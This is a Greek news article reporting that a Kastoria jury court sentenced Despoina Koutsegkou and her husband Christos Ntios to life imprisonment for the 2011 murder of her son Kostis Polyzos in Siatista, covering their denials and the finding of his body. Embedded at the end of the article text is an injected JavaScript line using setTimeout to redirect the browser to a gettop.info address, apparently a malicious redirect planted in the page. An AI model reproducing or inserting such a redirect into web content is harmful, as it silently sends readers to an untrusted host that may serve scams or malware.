Ισόβια στη μητέρα και τον πατριό του Κωστή Πολύζου

0
12

 

Σε μία μαραθώνια συνεδρίαση που διήρκεσε 5 ώρες, οι ένορκοι και τακτικοί δικαστές έκριναν ενόχους τη Δέσποινα Κουτσέγκου, μητέρα του Κωστή Πολύζου, και τον Χρήστο Ντιό, πατριό του, για τη δολοφονία του νεαρού στη Σιάτιστα Κοζάνης.

Το Μικτό Ορκωτό Δικαστήριο Καστοριάς καταδίκασε σε ισόβια καθειρξη στη Δέσποινα Κουτσέγκου και τον σύζυγο της Χρήστο Ντιό για την από κοινού δολοφονία του 23χρονου Κωστή Πολύζου τον Φεβρουάριο του 2011 στη Σιάτιστα.

Το δικαστήριο υιοθέτησε την πρόταση της εισαγγελέως έδρας για ισόβια κάθειρξη, ενώ επέβαλε και τη στέρηση των πολιτικών δικαιωμάτων στους δύο κατηγορουμένους.

Κατά την απολογία της η Δέσποινα Κουτσέγκου ισχυρίστηκε ότι δεν έχει διαπράξει κανένα έγκλημα, ούτε αυτή ούτε ο σύζυγός της, ενώ σε αρκετές ερωτήσεις της έδρας απαντούσε με το «δεν θυμάμαι, έχουν περάσει χρόνια» ενώ λίγο πριν από την ολοκλήρωση της απολογίας της και υπό τα πιεστικά ερωτήματα της έδρας ξέσπασε σε λυγμούς, επικαλούμενη το παιδί της που δεν θα γυρίσει πια.

Ο έτερος κατηγορούμενος, Χρήστος Ντιός, σύζυγος της μητέρας του Κωστή Πολύζου, καθ’όλη την διάρκεια της κατάθεσης του ήταν ψύχραιμος αλλά και σύντομος στην περιγραφή των περιστατικών. Αρνήθηκε οποιαδήποτε συμμετοχή στο θάνατο του Κωστή Πολύζου, λέγοντας, «Δεν έχουμε κάνει εμείς το φόνο».

Ο Κωστής Πολύζος, 23 χρόνων, χάθηκε το βράδυ της Παρασκευής 18 Φεβρουαρίου 2011 από το σπίτι του στη Σιάτιστα Κοζάνης. Οκτώ μήνες μετά την εξαφάνιση του, στις 26 Σεπτεμβρίου 2011, το πτώμα του βρέθηκε μισοφαγωμένο από τα άγρια ζώα στο κτήμα του πατριού του, στο σημείο Πασά Γεφύρι, στα σύνορα των νομών Κοζάνης-Γρεβενών. Το πτώμα του νεαρού εντόπισε περαστικός κυνηγός της περιοχής. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here